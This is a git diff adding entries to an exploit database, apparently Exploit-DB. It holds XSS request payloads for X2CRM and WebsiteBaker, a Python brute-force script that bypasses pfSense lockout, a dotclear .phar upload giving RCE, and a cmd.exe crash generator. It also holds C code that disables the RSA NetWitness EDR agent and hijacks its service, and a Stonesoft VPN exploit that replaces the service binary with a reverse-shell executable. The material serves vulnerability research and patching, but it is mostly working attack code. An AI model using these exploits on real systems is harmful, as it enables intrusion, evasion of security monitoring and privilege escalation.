+sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test + +EXPLOITATION +======== +1. Create an action +2. Inject payload to the vulnerable parameter in POST request + +Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E +''' \ No newline at end of file diff --git a/exploits/php/webapps/51346.txt b/exploits/php/webapps/51346.txt new file mode 100644 index 000000000..257302a9e --- /dev/null +++ b/exploits/php/webapps/51346.txt @@ -0,0 +1,45 @@ +# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated) +# Exploit Author: Betul Denizler +# Vendor Homepage: https://x2crm.com/ +# Software Link: https://sourceforge.net/projects/x2engine/ +# Version: X2CRM v6.6/6.9 +# Tested on: Ubuntu Mate 20.04 +# Vulnerable Parameter: model +# CVE: Use CVE-2022-48177 +# Date: 27.12.2022 + +''' + +POC REQUEST: +======== +GET +/x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E +HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) +Gecko/20100101 Firefox/108.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; +PHPSESSID=959fpkms4abdhtresce9k9rmk3; +YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; +d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; +locationTrackingFrequency=60; locationTrackingSwitch=1; +5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; +sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 + +EXPLOITATION +======== +1. Select Import Records Model in admin settings +2. Inject payload to the vulnerable parameter in GET request + +Payload: "> +''' \ No newline at end of file diff --git a/exploits/php/webapps/51349.txt b/exploits/php/webapps/51349.txt new file mode 100644 index 000000000..d1360f576 --- /dev/null +++ b/exploits/php/webapps/51349.txt @@ -0,0 +1,46 @@ +Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS) +Application: WebsiteBaker +Version: 2.13.3 +Bugs: Stored XSS +Technology: PHP +Vendor URL: https://websitebaker.org/pages/en/home.php +Software Link: https://wiki.websitebaker.org/doku.php/en/downloads +Date of found: 02.04.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +steps: + +1.Anyone who has the authority to create the page can do this +payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E + + +POST /admin/pages/add.php HTTP/1.1 +Host: localhost +Content-Length: 137 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: null +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9 +Connection: close + +b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add + + + +2. Visit http://localhost/ \ No newline at end of file diff --git a/exploits/php/webapps/51352.py b/exploits/php/webapps/51352.py new file mode 100755 index 000000000..6e189967f --- /dev/null +++ b/exploits/php/webapps/51352.py @@ -0,0 +1,95 @@ +#!/usr/bin/python3 + +## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass +## Google Dork: intitle:"pfSense - Login" +## Date: 2023-04-07 +## Exploit Author: FabDotNET (Fabien MAISONNETTE) +## Vendor Homepage: https://www.pfsense.org/ +## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz +## Version: pfSenseCE <= 2.6.0 +## CVE: CVE-2023-27100 + +# Vulnerability +## CVE: CVE-2023-27100 +## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100 +## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc +## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66 + +import requests +import sys +import re +import argparse +import textwrap +from urllib3.exceptions import InsecureRequestWarning + +# Expected Arguments +parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass", + formatter_class=argparse.RawTextHelpFormatter, + epilog=textwrap.dedent(''' +Exploit Usage : +./CVE-2023-27100.py -l http:/// -u user.txt -p pass.txt +./CVE-2023-27100.py -l http:/// -u /Directory/user.txt -p /Directory/pass.txt''')) + +parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)") +parser.add_argument("-u", "--usersList", help="Username Dictionary") +parser.add_argument("-p", "--passwdList", help="Password Dictionary") +args = parser.parse_args() + +if len(sys.argv) < 2: + print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]") + sys.exit(1) + +# Variable +url = args.url +usersList = args.usersList +passwdList = args.passwdList + +# Suppress only the single warning from urllib3 needed. +if url.upper().startswith("HTTPS://"): + requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + +print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass') + + +def login(userlogin, userpasswd): + session = requests.session() + r = session.get(url, verify=False) + + # Getting CSRF token value + csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text) + csrftoken = csrftoken.group(1) + + # Specifying Headers Value + headerscontent = { + 'User-Agent': 'Mozilla/5.0', + 'Referer': f"{url}", + 'X-Forwarded-For': '42.42.42.42' + } + + # POST REQ data + postreqcontent = { + '__csrf_magic': f"{csrftoken}", + 'usernamefld': f"{userlogin}", + 'passwordfld': f"{userpasswd}", + 'login': 'Sign+In' + } + + # Sending POST REQ + r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False) + + # Conditional loops + if r.status_code != 200: + print(f'[*] - Found Valid Credential !!') + print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}") + sys.exit(0) + + +# Reading User.txt & Pass.txt files +userfile = open(usersList).readlines() +passfile = open(passwdList).readlines() + +for user in userfile: + user = user.strip() + for passwd in passfile: + passwd = passwd.strip() + login(user, passwd) \ No newline at end of file diff --git a/exploits/php/webapps/51353.txt b/exploits/php/webapps/51353.txt new file mode 100644 index 000000000..02de7a75c --- /dev/null +++ b/exploits/php/webapps/51353.txt @@ -0,0 +1,50 @@ +Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) +Application: dotclear +Version: 2.25.3 +Bugs: Remote Code Execution (RCE) (Authenticated) via file upload +Technology: PHP +Vendor URL: https://dotclear.org/ +Software Link: https://dotclear.org/download +Date of found: 08.04.2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +While writing a blog post, we know that we can upload images. But php did not allow file upload. This time + + I wrote a file with the above payload, a poc.phar extension, and uploaded it. +We were able to run the php code when we visited your page + + +poc request: + + +POST /dotclear/admin/post.php HTTP/1.1 +Host: localhost +Content-Length: 566 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc +Connection: close + +post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password= + + + +poc video : https://youtu.be/oIPyLqLJS70 \ No newline at end of file diff --git a/exploits/windows/dos/51348.txt b/exploits/windows/dos/51348.txt new file mode 100644 index 000000000..491938dcd --- /dev/null +++ b/exploits/windows/dos/51348.txt @@ -0,0 +1,38 @@ +# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Date: 2023-03-30 +# Vendor Homepage: https://www.microsoft.com/en-us +# Software Link: https://www.microsoft.com/en-us +# Tested Version: N/A +# Tested on OS: Windows 11 Pro + +# [ About App ] + +Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. + +An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed. + +This issue affects Microsoft Windows 11 Pro. + +Note: Further analysis reveals that this is not a vulnerability; this BID is now retired. + + +# [ POC ] + +# 1.Run the python script, it will create a new file "PoC.txt" +# 2.Run Command Prompt +# 3.Copy the content of the file "PoC.txt" +# 4.Paste the content of dos.txt into the lin cmd.exe +# 5.Crashed ;) + +#!/usr/bin/env python +buffer = "A" * 339839907 +payload = buffer +try: +    f=open("PoC.txt","w") +    print "[+] Creating %s evil payload.." %len(payload) +    f.write(payload) +    f.close() +    print "[+] File created!" +except: +    print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/51332.txt b/exploits/windows/local/51332.txt new file mode 100644 index 000000000..a259c00fd --- /dev/null +++ b/exploits/windows/local/51332.txt @@ -0,0 +1,44 @@ +# Exploit Title: ActFax 10.10 - Unquoted Path Services +# Date: 22/03/2023 +# Exploit Author: Birkan ALHAN (@taftss) +# Vendor Homepage: https://www.actfax.com +# Software Link: https://www.actfax.com/en/download.html +# Version: Version 10.10, Build 0551 (2023-02-01) +# Tested on: Windows 10 21H2 OS Build 19044.2728 + +#Discover to Unquoted Services Path: + +C:\Users\taftss>sc qc ActiveFaxServiceNT +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ActiveFaxServiceNT +TYPE : 10 WIN32_OWN_PROCESS +START_TYPE : 2 AUTO_START +ERROR_CONTROL : 1 NORMAL +BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe +LOAD_ORDER_GROUP : +TAG : 0 +DISPLAY_NAME : ActiveFax-Server-Service +DEPENDENCIES : +SERVICE_START_NAME : LocalSystem + +C:\Users\taftss>systeminfo + +Host Name: RedsTaftss +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19044 N/A Build 19044 + +#Another Discover Methot to Unquoted Services Path: + +wmic service get name,displayname,pathname,startmode | findstr /i +"auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ + +#Exploit: + +If the attacker has taken over the system and the taken user has write +privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they +can inject their own malicious "ActSrvNT.exe" file. Then the +ActiveFaxServiceNT Service can be restarted to privilege escalation. + +-- +*Birkan ALHAN* \ No newline at end of file diff --git a/exploits/windows/local/51336.txt b/exploits/windows/local/51336.txt new file mode 100644 index 000000000..0144c1bb5 --- /dev/null +++ b/exploits/windows/local/51336.txt @@ -0,0 +1,285 @@ +# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + +[Vendor] +RSA Security +www.netwitness.com + + +[Product] +NetWitness Endpoint EDR Agent + +The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility +into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly +detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. + + +[Vulnerability Type] +Incorrect Access Control / Code Execution + + +[CVE Reference] +CVE-2022-47529 + + +[Security Issue] +CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. + +Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local +and admin Windows user accounts to modify the endpoint agent service configuration: +to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. + +Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. + +SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d +LANDeskService.exe + + +[Severity] +Critical + + +[Impact(s)] +Denial-of-Service +Arbitrary Code Execution + + +[Attack Vector] +To exploit, open handle to memory objects held by the endpoint agent, +modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group + + +[Affected Product Code Base] +All versions prior to v12.2 + + +[Network Access] +Local + + +[References] +https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 + + +[Vuln Code Block]: +00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p +.text:00000001400F7B10 ; sub_14013BA50+19?p +.text:00000001400F7B10 ; DATA XREF: ... +.text:00000001400F7B10 push rbx +.text:00000001400F7B12 sub rsp, 20h +.text:00000001400F7B16 mov rbx, rcx +.text:00000001400F7B19 test rcx, rcx +.text:00000001400F7B1C jz short loc_1400F7B5C +.text:00000001400F7B1E call cs:InitializeCriticalSection +.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection +.text:00000001400F7B28 call cs:InitializeCriticalSection +.text:00000001400F7B2E mov edx, 1 ; bManualReset +.text:00000001400F7B33 xor r9d, r9d ; lpName +.text:00000001400F7B36 mov r8d, edx ; bInitialState +.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes +.text:00000001400F7B3B call cs:CreateEventW +.text:00000001400F7B41 mov [rbx+50h], rax +.text:00000001400F7B45 mov dword ptr [rbx+58h], 0 +.text:00000001400F7B4C test rax, rax +.text:00000001400F7B4F jz short loc_1400F7B5C + + + +[Exploit/POC] +"RSA_NetWitness_Exploit.c" + +#include "windows.h" +#include "stdio.h" +#include "accctrl.h" +#include "aclapi.h" + +#define OPEN_ALL_ACCESS 0x1F0003 + +/* +RSA NetWitness EDR Endpoint Agent +Tamper Protection Bypass / EoP Code Execution +RSA NetWitness.msi --> NWEAgent.exe +MD5: c0aa7e52cbf7799161bac9ebefa38d49 + +Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. +Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. + +By John Page (hyp3rlinx) - Nov 2022 + +DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. +Users of this supplied PoC code accept all risks, do no harm. + +X64 PE file vuln code block: + +00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p +.text:00000001400F7B10 ; sub_14013BA50+19?p +.text:00000001400F7B10 ; DATA XREF: ... +.text:00000001400F7B10 push rbx +.text:00000001400F7B12 sub rsp, 20h +.text:00000001400F7B16 mov rbx, rcx +.text:00000001400F7B19 test rcx, rcx +.text:00000001400F7B1C jz short loc_1400F7B5C +.text:00000001400F7B1E call cs:InitializeCriticalSection +.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection +.text:00000001400F7B28 call cs:InitializeCriticalSection +.text:00000001400F7B2E mov edx, 1 ; bManualReset +.text:00000001400F7B33 xor r9d, r9d ; lpName +.text:00000001400F7B36 mov r8d, edx ; bInitialState +.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes +.text:00000001400F7B3B call cs:CreateEventW +.text:00000001400F7B41 mov [rbx+50h], rax +.text:00000001400F7B45 mov dword ptr [rbx+58h], 0 +.text:00000001400F7B4C test rax, rax +.text:00000001400F7B4F jz short loc_1400F7B5C + + +1) Install "RSA NetWitness.msi" (Endpoint EDR Agent) + +2) Run Exploit PoC as a Standard non-admin user, the PoC will: + + a) Open a handle (copy) to Ecat002 event. + b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group. + c) Set/Reset event the Ecat002 handle. + d) if admin privs change the EDR service configuration + + Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln. + +*/ + +char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"}; +BOOL PWNED=FALSE; +void Exploit(); +int AdminChl(); +void HijackSvcConfig(); + + +int main(void){ + printf("[+] RSA NetWitness EDR Agent 0Day\n"); + printf("[+] CVE-2022-47529\n"); + printf("[+] Discovery: John Page (aka hyp3rlinx)\n"); + printf("[+] ===================================\n"); + + Exploit(); + + if( AdminChk() ){ + printf("[+] Hijacked NetWitness Agent Service!\n"); + HijackSvcConfig(); + } + + Sleep(2000); + printf("[+] Done!\n\n"); + system("pause"); + +return 0; +} + +void Exploit(){ + + PACL pOldDACL = NULL; + PACL pNewDACL = NULL; + + HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002"); + int i=0; + + for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){ + + HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]); + + if(hEvent != INVALID_HANDLE_VALUE){ + + printf("[-] Targeting Event: %s\n", Vuln_Events[i]); + Sleep(500); + + if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){ + TRUSTEE trustee[1]; + trustee[0].TrusteeForm = TRUSTEE_IS_NAME; + trustee[0].TrusteeType = TRUSTEE_IS_GROUP; + trustee[0].ptstrName = TEXT("Everyone"); + trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; + trustee[0].pMultipleTrustee = NULL; + + EXPLICIT_ACCESS explicit_access_list[1]; + ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); + + explicit_access_list[0].grfAccessMode = DENY_ACCESS; + explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; + explicit_access_list[0].grfInheritance = NO_INHERITANCE; + explicit_access_list[0].Trustee = trustee[0]; + + if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ + printf("%s%d", "[!] Not vulnerable! ", GetLastError()); + } + + if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ + printf("%s%d", "[!] Not vulnerable! ", GetLastError()); + }else{ + SetEvent(hEvent_Ecat002); + Sleep(1000); + ResetEvent(hEvent_Ecat002); + CloseHandle(hEvent_Ecat002); + SetEvent(hEvent); + Sleep(1000); + PWNED=TRUE; + } + if(PWNED){ + LocalFree(pNewDACL); + LocalFree(pOldDACL); + CloseHandle(hEvent); + } + Sleep(1000); + } + } +} +} + +//If run as admin, modify the agent service config to run our own code. +int AdminChk(){ + int result = 0; + HANDLE hToken = NULL; + if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){ + TOKEN_ELEVATION elevated; + DWORD tokSize = sizeof(TOKEN_ELEVATION); + if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){ + result = elevated.TokenIsElevated; + } + } + if(hToken){ + CloseHandle(hToken); + } + return result; +} + + +//Trivial example modify the service config... +void HijackSvcConfig(){ + Sleep(1000); + WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0); +} + + +[POC Video URL] +https://www.youtube.com/watch?v=kO1fu4IOlSs + + +[Disclosure Timeline] +Vendor Notification: December 2, 2022 +CVE assigned: December 19, 2022 +Hotfix v12.1.0.1: January 3, 2023 +Fixed in v12.2.0.0 January 4, 2023 +Restested for vendor: January 6, 2023 +March 24, 2023 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/51341.txt b/exploits/windows/local/51341.txt new file mode 100644 index 000000000..f5d603c46 --- /dev/null +++ b/exploits/windows/local/51341.txt @@ -0,0 +1,140 @@ +# Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation +# Exploit Author : TOUHAMI KASBAOUI +# Vendor Homepage : https://www.forcepoint.com/ +# Software: Stonesoft VPN Windows +# Version : 6.2.0 / 6.8.0 +# Tested on : Windows 10 +# CVE : N/A +#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM + +#define UNICODE +#define _UNICODE +#include +#include + +using namespace std; +enum Result +{ + unknown, + serviceManager_AccessDenied, + serviceManager_DatabaseDoesNotExist, + service_AccessDenied, + service_InvalidServiceManagerHandle, + service_InvalidServiceName, + service_DoesNotExist, + service_Exist +}; + +Result ServiceExists(const std::wstring& serviceName) +{ + Result r = unknown; + + SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ); + + if (manager == NULL) + { + DWORD lastError = GetLastError(); + + if (lastError == ERROR_ACCESS_DENIED) + return serviceManager_AccessDenied; + else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST) + return serviceManager_DatabaseDoesNotExist; + else + return unknown; + } + + SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ); + + if (service == NULL) + { + DWORD error = GetLastError(); + + if (error == ERROR_ACCESS_DENIED) + r = service_AccessDenied; + else if (error == ERROR_INVALID_HANDLE) + r = service_InvalidServiceManagerHandle; + else if (error == ERROR_INVALID_NAME) + r = service_InvalidServiceName; + else if (error == ERROR_SERVICE_DOES_NOT_EXIST) + r = service_DoesNotExist; + else + r = unknown; + } + else + r = service_Exist; + + if (service != NULL) + CloseServiceHandle(service); + + if (manager != NULL) + CloseServiceHandle(manager); + + return r; +} + +bool ChangeName() { + LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe"; + LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe"; + bool success = MoveFile(parrentvpnfilename, newName); + if (success) { + cerr << "[+] SVGVPN filename changed.\n"; + } + else { + cerr << "Failed to rename file \n"; + } + return 0; +} + +int main() { + + const uint8_t shellcode[7168] = { + 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, + 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + }; //You can set array bin of your reverse shell PE file here + + std::wstring serviceName = L"sgipsecvpn"; + Result result = ServiceExists(serviceName); + if (result == service_Exist) + std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl; + else if (result == service_DoesNotExist) + std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl; + else + std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl; + ChangeName(); + HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n"; + if (fileHandle == INVALID_HANDLE_VALUE) { + cerr << "Failed to create shellcode\n"; + return 1; + } + + DWORD bytesWritten; + if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) { + cerr << "Failed to write to file\n"; + CloseHandle(fileHandle); + return 1; + } + CloseHandle(fileHandle); + + cout << "[+] Payload exported to ForcePointVPN \n"; + Sleep(30); + cout << "[+] Restart ForcePointVPN Service \n"; + SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS); + + SERVICE_STATUS serviceStatus; + QueryServiceStatus(serviceHandle, &serviceStatus); + if (serviceStatus.dwCurrentState == SERVICE_RUNNING) { + ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus); + while (serviceStatus.dwCurrentState != SERVICE_STOPPED) { + QueryServiceStatus(serviceHandle, &serviceStatus); + Sleep(1000); + } + } + StartService(serviceHandle, NULL, NULL); + + CloseServiceHandle(serviceHandle); + CloseServiceHandle(scmHandle); + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/local/51351.txt b/exploits/windows/local/51351.txt new file mode 100644 index 000000000..2f8415e23 --- /dev/null +++ b/exploits/windows/local/51351.txt @@ -0,0 +1,23 @@ +# Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Exploit Date: 2023-04-05 +# Vendor : https://www.eset.com +# Version : 16.0.26.0 +# Tested on OS: Microsoft Windows 11 pro x64 + +#PoC : +============== + +C:\>sc qc ekrn +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ekrn +        TYPE               : 20  WIN32_SHARE_PROCESS +        START_TYPE         : 2   AUTO_START +        ERROR_CONTROL      : 1   NORMAL +        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe" +        LOAD_ORDER_GROUP   : Base +        TAG                : 0 +        DISPLAY_NAME       : ESET Service +        DEPENDENCIES       : +        SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f031eb470..2b84da35e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -904,6 +904,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,,2020-03-16,2020-03-16,0,,,,,, 27945,exploits/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,webapps,asp,,2006-06-02,2013-08-30,1,CVE-2006-2873;OSVDB-26230,,,,,https://www.securityfocus.com/bid/18226/info 1840,exploits/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL 